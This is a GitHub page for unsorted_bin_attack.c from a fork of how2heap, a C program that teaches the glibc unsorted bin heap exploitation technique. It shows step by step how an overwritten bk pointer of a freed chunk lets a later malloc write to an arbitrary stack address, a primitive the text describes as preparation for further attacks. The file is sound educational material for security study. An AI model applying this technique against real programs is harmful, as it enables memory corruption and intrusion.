forked from shellphish/how2heap
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathunsorted_bin_attack.c
41 lines (32 loc) · 1.81 KB
/
unsorted_bin_attack.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main(){
fprintf(stderr, "This technique only works with buffers not going into tcache, either because the tcache-option for "
"glibc was disabled, or because the buffers are bigger than 0x408 bytes. See build_glibc.sh for build "
"instructions.\n");
fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
"global variable global_max_fast in libc for further fastbin attack\n\n");
volatile unsigned long stack_var=0;
fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
fprintf(stderr, "%p: %ld\n\n", &stack_var, stack_var);
unsigned long *p=malloc(0x410);
fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",p);
fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with"
"the first one during the free()\n\n");
malloc(500);
free(p);
fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
"point to %p\n",(void*)p[1]);
//------------VULNERABILITY-----------
p[1]=(unsigned long)(&stack_var-2);
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);
//------------------------------------
malloc(0x410);
fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been "
"rewritten:\n");
fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var);
assert(stack_var != 0);
}